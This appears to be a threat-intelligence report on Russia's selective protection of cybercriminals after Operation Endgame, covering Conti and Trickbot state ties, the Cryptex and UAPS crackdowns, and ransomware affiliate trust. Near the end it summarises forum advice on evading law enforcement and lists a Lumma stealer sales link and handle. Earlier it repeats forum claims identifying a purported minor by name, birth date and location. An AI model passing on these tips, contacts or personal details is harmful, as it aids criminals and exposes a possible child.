The report synthesizes: (1) public law-enforcement releases and Operation Endgame materials that enumerate targeted malware families, botnets, and money-movement services; (2) Russian legal, prosecutorial, and media statements that document arrests, seizures, and sentencing; and (3) dark web forum and Telegram communications that reveal underground reactions, trust dynamics, and operational adaptations. We also reference leaked chat archives and investigative reporting relevant to Conti and Trickbot and associated facilitators, where they illuminate alleged protection, information sharing, or tasking with state entities. This report also incorporates transnational policy developments and diplomatic events (for example, prisoner exchanges involving high-value Russian cybercriminals) to contextualize how external pressure intersects with Russia’s domestic calculus of protection and control. All such events are treated as indicators, not dispositive proof, of Russian state priorities and leverage.

Background

Dark Covenant

The “Dark Covenant” framework describes the web of relationships linking Russia’s cybercriminal underground to elements of the state, especially intelligence and law enforcement services, through a spectrum of direct ties, indirect affiliations, and tacit understandings. The original Dark Covenant report, published on September 9, 2021, argued that these relationships are longstanding and fluid; recruitment of skilled criminals (sometimes under threat of prosecution), selective protection, and the state’s ability to see and shape parts of the underground create an ecosystem in which cybercrime can persist when it serves state interests. Crucially, the report formalized three categories of linkage — direct associations, indirect affiliations, and tacit agreement — and emphasized that the absence of meaningful punitive action often signals tolerance or approval from the Kremlin.

Dark Covenant 2.0, released January 31, 2023, extended the model into wartime. It found that Russia’s full-scale invasion of Ukraine catalyzed visible shifts in the underground. Some threat groups openly pledged allegiance to the Kremlin, others splintered or rebranded, and “hacktivist” auxiliaries amplified information operations alongside cyberattacks. Insikt Group assessed that cybercriminal tools, infrastructure, and tactics, techniques, and procedures (TTPs) supplied plausible deniability for state operations, while headline arrests and forum bans looked more like reputation management than a genuine break with cybercrime. The 2023 report reaffirmed the three-tier linkage model and documented how war pressures deepened certain connections while obscuring others.

Across both reports, the throughline is not a single command-and-control structure but a pragmatic bargain. Russian services recruit or co-opt talent when useful, look the other way when activity aligns with state aims, and selectively enforce laws when threat actors become politically inconvenient or externally embarrassing. This “covenant” blends incentive, intimidation, and opportunism, producing a resilient gray zone where criminal enterprise doubles as an instrument of statecraft.

Dark Covenant 3.0 situates that bargain in the post-Operation Endgame era. The same ecosystem now operates under heavier international pressure, new domestic optics, and a more explicit politics of protection. The core construct remains intact — direct, indirect, and tacit bonds — but the edges have sharpened, with selective Russian crackdowns on low-utility enablers and continued insulation for threat groups that offer intelligence or geopolitical value. This report uses that lens to explain why Russia appears less like a uniform “haven” and more like a managed market — one where state interests, not law, determine who gets protected and who does not.

Operation Endgame

Operation Endgame was more than a multinational takedown — it was a public test of how far Western pressure can reach into an ecosystem where Russian cybercrime and elements of the state have long coexisted under a pragmatic “politics of protection.” In May 2024, Europol publicly announced the start of Operation Endgame, an initiative targeting ransomware precursors, specifically loader malware. However, based on the success of their first day of action in May 2024, Europol expanded its mandate to include other elements of the ransomware supply chain.

Operation Endgame was divided into two “seasons”: one set of major takedowns in May 2024, and the other in May 2025. In practice, those seasons bundled coordinated actions against loaders and enablers (for example, IcedID, SystemBC, Pikabot, SmokeLoader, Bumblebee, and others), classic botnets and bankers (Trickbot, Qakbot, DanaBot, Emotet, and others), and money-movement infrastructure (Cryptex, Universal Automated Payment Service [UAPS], PM2BTC, and others), alongside public designations like the European Union (EU) “Most Wanted” entries tied to Conti and Trickbot figures. A key element of the seasons was the release of targeted videos intended to intimidate threat actors to come forward with information. The decision to pair technical disruption with naming-and-shaming videos signaled an influence campaign aimed at affiliates and suppliers, accelerating debates on OPSEC, trust, and the viability of malware-as-a-service (MaaS) within Russian-language forums.

Operation Endgame’s impact clarifies which parts of the Russian underground the state is willing to protect and which it is not willing to protect. Russian authorities have conspicuously moved against certain facilitators (for example, Cryptex, UAPS, and later, Aeza-linked executives). At the same time, higher-value ransomware networks with suspected ties or usefulness to security services have largely avoided commensurate consequences, reinforcing our assessment that Russia’s “safe haven” is conditional, selective, and governed by state interests rather than law.

Threat Analysis

Russian Government Actions and Response to Operation Endgame

Since the start of Operation Endgame, open-source media, comments in leaked chats, and public posts on various Russian-language criminal sources have indicated that Russian authorities have targeted key services that enable ransomware operations. Appendix A shows a timeline of Russian enforcement operations Insikt Group has been monitoring. Based on our review of leaked private communications between threat actors, other arrests likely occurred, but it is unclear whether other non-publicized events exist.

These operations are not merely episodic police work; they are indicators of how the “politics of protection” functions in practice. Actions against facilitators like Cryptex or UAPS — raids, mass detentions, and asset seizures — demonstrate that Moscow will act when services are politically costly or provide limited intelligence value to the state, especially after Western pressure concentrates attention on specific nodes in the ransomware economy. By contrast, comparatively muted or opaque steps against Trickbot-linked figures, despite European Union (EU) “Most Wanted” designations and extensive Operation Endgame signaling, align with evidence from leaked chats to suggest that ties between senior operators and security services persist. This suggests there is insulation where threat groups retain strategic utility for the state.

This selective pattern matters for three reasons. First, it reframes the “safe haven” idea as conditional: Russia is safest for threat actors who serve state interests, while monetization layers without state value (for example, laundering services) become expendable under pressure. Second, it alters underground behavior. Operation Endgame triggered OPSEC overhauls, forum debates, and trust fractures among affiliates, pushing operators toward closed channels, stricter vetting, and new business models. Third, it clarifies attribution risk for defenders and policymakers; high-value ransomware ecosystems persisting while cash-out infrastructure is dismantled signals that this asymmetry is a result of the state’s cost-benefit calculus instead of a misstep in law enforcement.

In short, the timeline of Russian enforcement following Operation Endgame highlights where Russian threat actors prioritized their resources in response to counter-ransomware efforts. Crackdowns on Cryptex or UAPS and pressure on hosting providers like Aeza demonstrate a willingness to act where domestic optics or Western scrutiny are high, while lenient or performative outcomes (for example, suspended sentences for REvil threat actors) and the continued prominence of Conti and Trickbot alumni reveal where the covenant still holds. This is why documenting both public actions and rumored, unpublicized arrests matters. The mix of visibility, selectivity, and outcome severity maps the contours of protection versus enforcement, and, therefore, where Western disruption is effective and where resilience persists.

Conti: Multiple Layers of Protection Insulate it from Significant Action

As part of Operation Endgame, European authorities persistently targeted Conti Ransomware Group members, affiliates, and close associates, including Trickbot, who enabled their ransomware activities. (Conti and Trickbot are interlinked, as Conti is a ransomware variant developed by members of the Trickbot Gang.) The persistent focus on Conti and Trickbot acknowledges their outsized role as a talent hub, a service marketplace, and, crucially, a network with alleged touchpoints to Russian services.

Operation Endgame included sending targeted videos to the threat actors to receive further intelligence, seizing infrastructure, and publicly naming members of the threat group while adding them to the EU’s Most Wanted list. Operation Endgame’s mix of technical seizures and “naming-and-shaming” was designed to pressure not only operators but also their suppliers and social networks. In Dark Covenant terms, this tactic probed the connection between these criminal enterprises and their state-linked protection: When public attribution raises diplomatic costs, insulated threat actors must either lean more heavily on their protectors or fragment.

As part of Season 1 (2024) in May 2024, the German Bundeskriminalamt (BKA) named Fyodor Aleksandrovich Andreev (aka “Angelo”) to its most wanted list for his role as a member of the Trickbot group. In July 2024, Russian media reported that Andreev had been arrested. Around the same time as the arrest of Andreev, within the leaked BlackBasta chats, Insikt Group uncovered that other members of the Conti Group based in Ukraine had been detained or searched. Also in September 2024, another Conti member disclosed to “Tramp” that they were released from custody; it is unclear when they had been arrested. However, many of these events targeting Russian Conti or Trickbot members have not been publicized in Russian or English media.

This pattern — sporadic detentions, rapid releases, and sparse official coverage — reads as reputational triage rather than a decisive campaign. Short, ambiguous custodial actions can satisfy external pressure while preserving the threat group’s operational core and its perceived value to state actors. It also creates strategic ambiguity inside the underground: members cannot tell whether arrests signal real risk or performative pressure, which frays trust and complicates affiliate recruitment without dismantling leadership.

As part of the second tranche of Operation Endgame announcements, the German BKA also publicly announced the following additional Conti and Trickbot members had been added to the EU’s Most Wanted list:

• Iskander Rifkatovich Sharafetdinov (aka “alik”, “gucci”), 32, a member of Trickbot
• Mikhail Mikhailovich Tsarev (aka “mango”), 36, a member of Trickbot
• Maksim Sergeevich Galochkin (aka “Bentley”, “Manuel”, “Max17”, “volhvb”, “crypt”), 43, a member of Trickbot
• Vitalii Nikolaevich Kovalev (aka “stern”, “ben”, “Grave”, “Vincent”, “Bentley”, “Bergen”, “Alex Konor”), 36, a member of Trickbot

But despite these additions, Insikt Group has not yet observed Russian law enforcement actions against these individuals. This is likely due to Conti and Trickbot receiving various degrees of protection from multiple groups within the Russian government, ranging from politicians to the security services. In fact, within the BlackBasta leaked chats, “Chuck”, one of the developers of Qakbot, claimed that Bentley, the leader of Trickbot (Vitali Nikolaevich Kovalev), was linked to the Russian Federal Security Service (FSB). German authorities also state that Kovalev was the leader of the Conti Ransomware Group using the moniker “Stern”. However, multiple higher-level members of Conti and its predecessor, Trickbot, likely have links to Russian intelligence beyond Kovalev, including “Professor”, “Target”, “Silver”, and “Brooks”, who openly discuss their relationship with Russian intelligence in other leaked chats.

The juxtaposition is telling: Western warrants escalate transparency and travel risk, while the absence of matching Russian action signals enduring domestic protection. That asymmetry is the essence of the “politics of protection.” If senior figures can rely on connections to intelligence or political patrons, the deterrent effect of international designations diminishes inside Russia. Practically, it allows Conti and Trickbot alumni to preserve leadership, developer pipelines, and affiliate coordination, even as rebrands and splinters create a veneer of churn.

Based on analysis of the leaked Tricktbot and Conti chats, there is anecdotal evidence that Conti (or at least members of it) received some tasking from various unknown Russian intelligence officials. In one instance, Professor provided a list for the Russian GRU to review. Some researchers speculate that this was a list of historical targets supplied to the GRU for further targeting. In addition, Professor was aware that his “paying” SVR contacts were requesting intelligence related to COVID-19. Based on Professor’s comments, it is implied that either he had an informant relationship with SVR or paid them bribes to ensure they would not be arrested.

Separately, several victims of Conti also align with the interests of Russian Intelligence; this would include Bellingcat and Academi LLC (formerly Blackwater). Conti supposedly targeted the open-source intelligence (OSINT) investigations network members of Bellingcat for the FSB. Based on leaked Conti chats, Conti also conducted a July 2020 breach of the US Private Military Contractor Academi. It is unclear whether this was tasked or whether they were fulfilling some patriotic duty; however, it seems the Russian government did receive files from Academi.

Even if anecdotal, these touchpoints map a spectrum of linkage — tasking, paid relationships, and “patriotic” servicing — that fits Dark Covenant’s direct/indirect/tacit model. For defenders and policymakers, this matters because it blurs the boundary between criminal profit-seeking and state-directed collection. When victim selection overlaps with state priorities, disruption becomes harder; you are not just dismantling a profit engine, you are degrading a potential auxiliary of state intelligence, which is more likely to be sheltered at home and harder to fracture abroad.

Additionally, according to a separate researcher, Conti likely had protection from Vladimir Ivanovich Plotnikov, a member of the Russian Duma from Perm. According to the researcher, Plotnikov was purportedly on several private flights with members of Conti when they went to Dubai in the United Arab Emirates (UAE). Based on this, it is likely that Plotnikov is providing some sort of protection to those who flew with him to the UAE. Figure 1 displays images of Plotnikov from a Telegram channel.

Figure 1: Telegram message highlighting Plotnikov and his relationship with Conti (Source: Recorded Future)

Alleged ties to a sitting Duma member illustrate how protection can extend beyond security services into political patronage networks, broadening the shield available to high-value threat actors. For the underground, such relationships signal who is “untouchable,” reinforcing hierarchy and attracting affiliates. For external disruptors, they explain why sanctions, designations, and even arrests abroad may not trigger corresponding domestic action. Political capital at home outweighs reputational costs abroad. In aggregate, these layers — intelligence touchpoints, bribery or “insurance,” and political patrons — help explain why Conti- and Trickbot-linked figures have weathered Operation Endgame’s pressure better than cash-out services and peripheral enablers.

Cryptex/Taleon Operation Indicate a Worn-Out Relationship

In September 2024, under Operation Endgame, American and European authorities seized infrastructure and cryptocurrency proceeds related to three money laundering services operated by Sergei Ivanov: Cryptex, PM2BTC, and UAPS. In addition, the US Department of the Treasury sanctioned Cryptex and Sergey Ivanov for their roles in laundering proceeds from numerous online illicit services, including ransomware, through these platforms. The Financial Crimes Enforcement Network also named PM2BTC, which does not have a know-your customer (KYC) policy, a primary money laundering concern. The US government alleges these services have been used to launder over a billion dollars in criminal proceeds.

This cluster of actions is significant because it strikes at the monetization layer that underpins the broader ransomware economy. Targeting Cryptex, PM2BTC, and UAPS — then amplifying the pressure with sanctions and a “primary money laundering concern” designation — signals to Russian authorities that specific nodes are now diplomatically costly for the Kremlin to ignore, raising the reputational price of continued tolerance. Furthermore, when trusted laundering schemes are dismantled, affiliates hesitate, deposits and collateral demands rise, and the perceived safety of operating inside Russia narrows, even if core ransomware groups remain insulated.

Figure 2: Image from the Operation Endgame video about Cryptex. (Source: operationengame[.]com)

As of October 2, 2024, approximately one week after the UAPS operation, the SKR publicly announced the opening of an investigation into the UAPS payment system and the Cryptex cryptocurrency exchange. As part of this announcement, the SKR claimed to have arrested nearly 100 people associated with these services, seized $16 million in Russian rubles, and also seized various vehicles and property. As of December 2024, at least two members (Ruslan and Roman Orekhovsky) were still under house arrest while the leader of the threat group (Sergey Ivanov) was in pre-trial detention.

The speed and optics of the SKR announcement — mass detentions, cash and property seizures, and highly visible imagery such as the cash-seizure photo (Figure 3) — suggest a case chosen to demonstrate domestic responsiveness without touching higher-value, state-useful ransomware networks. The choice of target (financial facilitators rather than core operators) and the lead agency (Investigative Committee rather than security services) align with an equilibrium: money services are expendable when foreign pressure is high and their intelligence value is low, whereas threat groups with alleged service ties retain relative insulation. The legal outcomes to date — house arrest for some, pre-trial detention for Ivanov — preserve prosecutorial theater while leaving room for negotiated resolutions, consistent with past Russian cybercrime cases where sentences are lighter than Western benchmarks. For defenders and policymakers, this asymmetry is instructive, as Western pressure can force action, but Moscow determines how this action will be enforced. It also clarifies where disruption will occur next (for example, hosting providers and payment brokers) versus where resilience will persist (state-linked operator circles).

Figure 3: Picture of money seized in SKR operation targeting Cryptex and UAPS (Source: CyberScoop via SKR)

The Safe Haven Theory Has Become More Nuanced

Insikt Group assesses that the relationship between Russian cybercriminality and security services is nuanced, as it is affected by multiple variables. This nuance reflects a shifting mix of direct ties, indirect facilitation, and tacit tolerance that varies by threat actor utility to the state. This concept does not account for bribery, Russian services coopting a relationship with cybercriminal actors for a greater benefit to the state, or that rivalries might exist between Russian government agencies. These incentives and rivalries help explain why certain nodes (for example, monetization services) are expendable while core operator circles with perceived intelligence value are insulated.

Based on known incidents, it is most likely that Russian cybercriminals pay security services for protection; these services also likely call on cybercriminals to support the state in the form of data or cyber attacks. This reciprocal arrangement creates a conditional “safe haven” that tightens or loosens depending on political cost, external pressure, and the threat actor’s ongoing usefulness. If the threat actor becomes too significant or does not provide enough support, security services will leverage their legitimate powers to target or harass the victim with their legitimate policing powers. Such episodic enforcement is best read as governance of the market, not its eradication.

However, once it has left the investigative phase, recent sentencing in Russian courts has maintained the appearance of Russia as a haven, for example, despite Russian authorities arresting multiple REvil threat actors in 2023. REvil threat actors have not received similar sentences to what they could receive in the United States (US). According to open-source reporting, Russian courts gave these individuals suspended sentences. This is similar to previous arrests, such as those tied to RBS Worldpay, where suspects received suspended sentences. Lenient outcomes signal to domestic threat actors that as long as there are no targets within Russia and the Commonwealth of Independent States (CIS), they will receive limited punishment for their activities, reinforcing the covenant’s credibility despite headline arrests.

Insikt Group assesses that, at least in some instances, Russian authorities were likely aware of these threat actors and took action only because of Western pressure. This aligns with a “pressure-response” pattern in which Moscow prioritizes reputational management over dismantling strategically useful networks. The threat actors were not providing something of value to the state compared to the pressure being placed on Russian authorities. For example, with Cryptex, Russian authorities initiated an investigation, identified over 100 subjects, and developed a cause within their legal regime to arrest them. In addition, the courts determined that Sergey Ivanov should stay in detention as of December 2024. The lead investigating agency was the Investigative Committee, rather than the Ministry of Internal Affairs or the FSB. Regardless of investigative agency, this timeframe seems impractical for such a complex multi-region operation, indicating that this threat actor was likely tracked for some time before the operation. This is also reflected in public posts on criminal forums, where one threat actor said that Cryptex had to have been under surveillance of Russian authorities for a period of time for this to have occurred. Taken together, these factors suggest the operation was a prepositioned lever — activated when international costs rose — rather than a spontaneous crackdown.

Within Russian-speaking cybercriminal sources, there were minimal public posts on the matter. Several threat actors on Korovka Forum showed dismay and surprise that Russian law enforcement acted in general. Several Verified Forum threat actors also hesitated to use services similar to Cryptex and forums in light of the recent actions. This chilling effect on cash-out services illustrates how targeted pressure reshapes underground risk calculus even when core ransomware operators remain intact.

The targeting of Ivanov and Cryptex could be due to which agency conducted the operation, or because Ivanov and Cryptex were solely related to money rather than providing information and data to Russian authorities. That distinction — money versus intelligence utility — is central to where protection is extended or withdrawn. Some members of Conti had intimated that the Intelligence Services were neutral or sympathetic to ransomware operations, while the police (like the SKR or MVD) were on the same side as American services (this was around the same time as there was limited cooperation between Russia and the US post-ransomware attack on Colonial Pipeline in 2021). This split helps reconcile the simultaneous tolerance of operators and pressure on facilitators.

In contrast, Insikt Group has only seen limited operational activity within Russia targeting members of Conti (and its multiple splinter groups), and much of this activity appears to be perceived harassment or intimidation by various authorities. Harassment without decisive prosecutions preserves leverage over threat actors while avoiding the strategic loss of a useful proxy capability. Based on leaked chats and public posts on criminal sources, Insikt Group has identified Tinker, Bio, and Angelo as having experienced some interactions with Russian authorities. However, Kovalev, the head of Conti, was known to Russian security services. In addition, other members were associated with Russian Intelligence Services; Conti members openly shared information with the Intelligence Services to fulfill intelligence requirements, likely providing the Russian government more utility than money laundering organizations. This asymmetry of treatment is a defining feature of the covenant’s “politics of protection.”

Within Russian criminal sources, much of the discussion on arrests related to Conti and Trickbot was limited to discussions of how Russian authorities became aware of Angelo and the role of Interpol in the arrest of Angelo. The narrow focus underscores that community concern centers on exposure pathways, not on a fundamental expectation that high-value operators will face severe domestic penalties.

Impact on Cybercriminal Trust and Recruitment

Against this backdrop of selective protection and targeted sacrifices, the market signals inside the underground shifted in ways that map directly to the Dark Covenant’s incentives structure and risk calculus.

Since the beginning of Operation Endgame (May 2024), Insikt Group has observed a decrease in the number of open RaaS affiliate program advertisements on the dark web, especially related to long-active and credible ransomware groups. However, the number of new RaaS advertisements was still significant — we have seen at least 21 open RaaS affiliate programs launched since May 2024. The primary platforms for advertisements were Ramp, XSS, BreachForums 2, and Telegram. For the same period, we observed that in addition to Commonwealth of Independent States (CIS) countries, ransomware operators block any attacks on BRICS countries (China, India, Brazil, South Africa, Russia, Egypt, Ethiopia, Indonesia, Saudi Arabia, and the UAE). Ransomware operators still prefer Russian-speaking affiliate members over English-speaking ones because they assess that the English-speakers are more likely to be researchers or Western law enforcement agents who can pose a significant risk to them.

Fewer open advertisements and a pivot toward semi-closed recruitment are rational adaptations to perceived infiltration and selective domestic enforcement. Operators try to keep the revenue engine running while shrinking their exposure surface. The continued emergence of new programs, despite headline pressure, shows the underlying business remains attractive, but the bar for trust is higher and more culturally gated. The explicit “no-attack” carve-outs for BRICS mirror the political boundaries of protection: avoiding blowback against states viewed as friendly or strategically important reduces the chance of losing domestic cover. Finally, the preference for Russian-speaking affiliates is both an OPSEC filter and a social signal, privileging the in-group that is most legible to protectors and least likely to invite Western attention, thereby reinforcing how market behavior and state tolerance coevolve within the Dark Covenant.

Affiliate Member Recruitment or Vetting

For the research period, we did not observe any significant changes in ransomware affiliate member recruitment and vetting processes. They are aligned with the previous requirements; however, since Operation Endgame, we have observed that many ransomware owners have become more selective about hiring affiliate members. The core mechanics remain intact, but the threshold for entry has risen. Post-Operation Endgame, operators price-in higher detection risk by shrinking the attack surface — favoring known circles, screening harder, and externalizing risk to affiliates — rather than restructuring the RaaS model itself.

• RaaS operators require activities from affiliate members. Typically, they ban affiliate members who have been inactive for one month and delete their accounts. In some cases, the accounts can be banned after ten days (Mamona RaaS) or fourteen days of inactivity (PlayBoy RaaS). Activity requirements function as a trust-and-liquidity control: they weed out sleepers (including potential infiltrators) and keep the pipeline producing ransom leverage, effectively taxing affiliates with “proof of life” to remain inside the circle.
• For security reasons, new affiliate members may be required to make deposits (for example, $5,000) on other reputable forums. Deposits substitute for eroded social capital. Where vouching used to suffice, capital-at-risk becomes the screening proxy, raising costs for scammers and making infiltration more expensive.
• Some ransomware operators do not allow targeting (encrypting and exfiltrating data) of non-profit organizations, healthcare, and government entities (for example, Anubis or PlayBoy ransomware). Targeting rules are both reputational hedges and political boundary markers. They reduce heat from domestically sensitive classes and align with the covenant’s implicit “lines not to cross” that would jeopardize tolerance.
• There is a minimum ransom demand per victim ($50,000 or more). Floor pricing narrows churn, prioritizes higher-yield victims, and preserves brand leverage, compensating for fewer open affiliates by pushing margins up where risk is justified.
• Repeated attacks on the same victims are forbidden. Anti-collision policies protect negotiation credibility and reduce noise that draws attention from law enforcement and platforms — an internal norm that sustains the business under scrutiny.

The above-mentioned restrictions were likely put in place due to the frequent scam attempts and a number of unqualified RaaS affiliate members. On August 11 and 12, 2025, the threat actor “MikeMelton”, a member of CHAOS Ransomware Group, on the forum Ramp, posted that previously, this kind of forum was a privileged place to conduct business and required a perfect reputation and vouching from other credible dark web community members. However, recently, businesses such as hacking and carding started attracting a lot of unskilled and inexperienced individuals or agents, which makes all business threads immediately public; that is why members stopped sharing their experience. It is currently a place for trade and scammers. According to the threat actor, the reputation is based only on a deposit on forums, but not on real activity. This lament captures the structural shift: reputational gatekeeping has degraded under pressure, so markets default to financial collateral and closed-channel vetting. In Dark Covenant terms, as state tolerance grows more conditional and external pressure rises, underground threat actors self-regulate with higher costs and tighter circles, thus sacrificing openness for survivability.

Figure 4: MikeMelton posted their opinion regarding the current dark web community reputations and developments; the post was translated using Google Translate (Source: Ramp Forum)

Examples of Increase or Decrease in Trust Among RaaS Affiliate Members

Since 2024, we have observed posts on dark web forums where threat actors complained about participating in RaaS affiliate programs, stating that ransomware owners scammed them. This erosion of trust reinforces the shift from open advertisements to closed, collateralized recruitment consistent with the covenant’s self-protective logic.

Qilin RaaS Affiliate Member Dispute

On July 22, 2025, the threat actor “hastalamuerte” on the forum Ramp filed a complaint against “Haise”, an operator and representative of Qilin Ransomware Group on criminal sources. hastalamuerte accused Haise of not paying them their portion of the ransom. The threat actor stated that their team was affiliated with Qilin Ransomware Group and that they targeted fourteen victims within the last one-and-a-half months. They stated that they had an agreement with Qilin Ransomware Group to receive $200,000 for these victims, but the support of Qilin suddenly disappeared, and hastalamuerte estimated a loss in profit of $48,000. This kind of public non-payment dispute erodes the perceived reliability of RaaS “platforms,” pushing operators toward tighter, collateralized, and culturally gated affiliate models consistent with the covenant’s self-protective logic.

In response to the claim, Haise replied that hastalamuerte is affiliated with “DevManager” (threat actor “Devman”), who tried to work with Qilin and provided corporate networks. According to Haise, Devman has been publishing these victims before closing negotiations on their own extortion website, Devman Blog. Furthermore, Devman allegedly tried to steal the source code of Qilin ransomware and hire one of its developers. They also mentioned another “weird” affiliate member who targeted twenty entities and refused to publish them on Qilin’s extortion blog. hastalamuerte replied that they became a ransomware affiliate through a college of Devman and did not hide that they knew each other. The dispute was closed by the administration of Ramp Forum on July 31, 2025, without any negative consequences for Haise. Forum arbitration that favors the operator over the affiliate signals power asymmetry inside RaaS ecosystems and deters future whistleblowing, but it also accelerates the affiliate flight risk that operators then counter with deposits, KYC-lite checks, and closed recruitment.

The conflicts between affiliate members and RaaS owners happened earlier. Among the most notable examples was the conflict between the currently disbanded ransomware group ALPHV and their former affiliate “notchy”.

Emergence of Ransomware Impersonators

In the second half of 2024 and in 2025, Insikt Group observed multiple instances of the emergence of ransomware group impersonators with pure scam intentions. Among these groups were RebornVC, Babuk 2.0, Bjorka Spirit (Ransomware), GD LockerSec, FunkSec, Dispossessor, and Rabbit Hole. The proliferation of impersonators dilutes brand credibility across the ecosystem, accelerates “trust flight” to closed circles, and raises acquisition costs for legitimate affiliates — outcomes that align with the Dark Covenant’s shift from open markets to tightly managed, state-tolerated networks.

For example, on January 26, 2025, Babuk ransomware v. 2.0 was released on the dark web and included an announcement for their affiliate program. The threat group released the primary terms and conditions of the program, indicating the threat group does not target hospitals (except private plastic surgeries and dental clinics), any non-profit charitable foundations, schools (except major universities), or small businesses (companies with less than $4 million in annual revenue). It is worth mentioning that analysis of the victims posted on the extortion website revealed that 90% of the victims had already been listed by other ransomware groups. According to GuidePoint’s Research and Intelligence Team (GRIT), out of 64 victims initially listed by the ransomware operators on the extortion website, 26 victims had been listed by FunkSec Group, 26 victims by RansomHub Ransomware Group, and four by LockBit 3.0 Ransomware Group. Recycled victim lists suggest opportunistic “signal hijacking,” eroding the informational value of leak websites and undermining extortion leverage — another force pushing operators toward curated channels and vetted partnerships.

In January 2025, Babuk 2.0 ransomware operators announced their cooperation with the threat actor “Bjorka” (same time as GD LockerSec Ransomware Group). These fluid “partnership” claims function as reputational arbitrage: impersonators borrow brand equity to lure affiliates and victims, while real operators respond by tightening verification and provenance checks. Almost immediately in January 2025, Insikt Group observed an increase in Telegram activities associated with “Bjorka Spirit (Ransomware)”, a purported ransomware group that is operated by the threat actor Bjorka. We assess that Bjorka does not operate a ransomware group, but performs hacking and data leak activities; however, the Telegram group indicates active cooperation between Bjorka and ransomware group operators such as Babuk Locker 2.0, GD Locker, FunkSec, and more.

Insikt Group identified further discussions on the dark web regarding the threat actor “SkyWave”, an alleged member of Babuk 2.0 Ransomware Group, where users claimed that the monikers SkyWave, “Bjorkanism”, and “BabukLocker” are all used by the same individual, Aditya Dani Herlambang. Aditya was born on March 17, 2009, is male, and possibly located in Pangkot, Manado Sulawesi Utara, Indonesia.

We assess that all these threat groups are operated by the same cybercriminal team that constantly publishes already leaked data on the dark web. Telegram banned multiple Telegram channels operated by the above-mentioned groups due to the violation of its Terms of Service (ToS); however, Telegram’s low-entry barriers enable rapid rebranding and audience capture, which inflates noise and further incentivizes serious threat actors to migrate negotiations off public channels.

From May 2024, Insikt Group observed more examples of ransomware and data extortion groups publishing or reselling already compromised data, such as the currently defunct Dispossessor Ransomware Group (primarily reposting LockBit 3.0’s victims) and Rabbit Hole Blog (reselling already leaked data from various ransomware groups). Impersonation and resale schemes are market noise that strengthens the case for smaller, protected constellations of threat actors — those most likely to be legible to domestic protectors and least exposed to Western pressure.

Internal Perception and Community Discussion

Operational Security Discussion

Throughout both the 2024 and 2025 iterations of Operation Endgame, Insikt Group has observed numerous threads on high-tier forums such as Exploit and XSS discussing the takedowns and arrests, particularly with regard to law enforcement deanonymization techniques, recommended operational security changes, and risk calculus for participating in MaaS projects. Insikt Group observed users increasingly urging each other to move to decentralized messaging platforms, citing that centralized communications platforms and email providers comply with law enforcement. Multiple users recommended moving communications from Telegram to platforms such as Session, Jabber, and Tox, though numerous users also cited vulnerabilities in Tox, such as IP address leaking between users. Insikt Group also observed several threads discussing the security of the Tor browser, with one thread expressing skepticism about updates to the browser, Whonix, and Qubes, and other guides published regarding how to use the browser safely. Many users recommend a multi-layer approach to operational security, including the use of Tails, virtual machines, Tor browser, and neighbors’ Wi-Fi networks rather than one’s own. We also observed threads specifically posing the question of protecting data on computers and mobile phones in the case of seizure by law enforcement, with multiple users suggesting the use of VeraCrypt hidden volumes to secure hard drives. Users also compared the security of various mobile operating systems and manufacturers’ willingness to unlock seized devices, with most users agreeing that trusting iOS and Android should be avoided, and several users recommending GrapheneOS instead, with still others dismissing having a smartphone at all as being insecure and insisting on using older burner phones only.

Analytically, this OPSEC pivot reflects the Dark Covenant in practice: when state tolerance becomes conditional and Western pressure rises, threat actors reduce centralized exposure, raise the technical bar to entry, and privilege in-group channels, trading scale for survivability. These adaptations increase transaction costs for affiliates (deposits, vetting, and toolchains) and fragment visibility for defenders, but they also create new error surfaces (misconfigured Tox, Tor hygiene lapses, and burner OPSEC) that can be exploited. The net effect is a shift from mass, open coordination toward smaller, semi-closed constellations that are more legible to domestic protectors and harder for outsiders to infiltrate.

Concurrent to Operation Endgame, Russian law enforcement engaged in arrests of various ransomware threat actors, including those related to REvil. Within the leaked BlackBasta chats, one of the group members highlighted a REvil-related arrest that occurred in November 2023. As a result, the threat group wiped the wallets and other data they had shared with the arrested REvil threat actor, indicating some fear of further Russian law enforcement actions. This reaction underscores the covenant’s “governed market” dynamic: selective domestic pressure is credible enough to compel precautionary hygiene (wallet purges and compartmentation) without dismantling core ecosystems, reinforcing a conditional safe haven that Moscow can tighten or loosen to manage risk and influence behavior.

Lumma Disruption Discussion

In another thread discussing Operation Endgame, which resulted in the takedown of Lumma Stealer infrastructure, multiple users expressed uncertainty in the security of the MaaS model, citing that the operation was openly targeting Lumma affiliates and customers, rather than only the developers and operators of the malware. Multiple users stated that the only way to operate is to write your own stealers and malware and store your own data privately, stating that users should not trust “public” commodity malware providers like Lumma. The user “Theriella” stated that Lumma developers are likely safe due to their presence in Russia, and that although this likely means that they need to give a cut to the “structures” (likely institutions such as law enforcement), it was still better than operating on US territories; another user countered by saying that eventually “money will run out and your own will eat you to the bone.” This debate captures the Dark Covenant tradeoff: commodity MaaS maximizes scale but invites cross-border exposure, while “write-your-own, keep-your-own-data” models shrink visibility and re-center protection on domestic ties — especially if developers can “tax” themselves to local structures for cover. The perception that Russia-based developers are safer, even if they share proceeds with “structures,” reinforces a governed-market logic in which proximity to protectors substitutes for platform trust.

Several users also claimed that despite the disruption, Lumma “went private” via closed channels, which aligned with observations from researchers of continued infections and log availability. Notably, as of September 2025, Lumma has appeared to resume public-facing operations with an August 29, 2025, post on Ramp Forum releasing updates to Lumma, with inclusion of a link tree (usrlnk[.]io/lumma) as well as a Telegram handle ([@]lummaseller128) for purchasing access to the panel. This oscillation, from public to private and back, illustrates resilience patterns common in covenant-aligned ecosystems: close ranks under pressure, monetize quietly while the situation is intense, then re-emerge when enforcement attention shifts. For defenders, it implies that takedowns depress liquidity temporarily but do not eliminate capability; for policymakers, it signals that durable impact requires sustained pressure on both operators and the domestic incentives that enable their return.

Discussions of Charged Individuals

In addition to analyzing individual threads, Insikt also tracked user activities of individuals implicated in Operation Endgame and discussions of their forum activities. We observed that several users named by the operation, such as “Jimmbee” (Aleksandr Stepanov), “psevdo”, and Chuck, remain members of their respective forums and have not been banned by administrators. Other users, such as the developer of Lumma (“Shamel”), were banned on the forum per their own request. The continued presence of named users, absent universal bans, signals that underground governance prioritizes utility and reputation over external designations, reinforcing the covenant’s logic that social capital and perceived protection can offset public exposure.

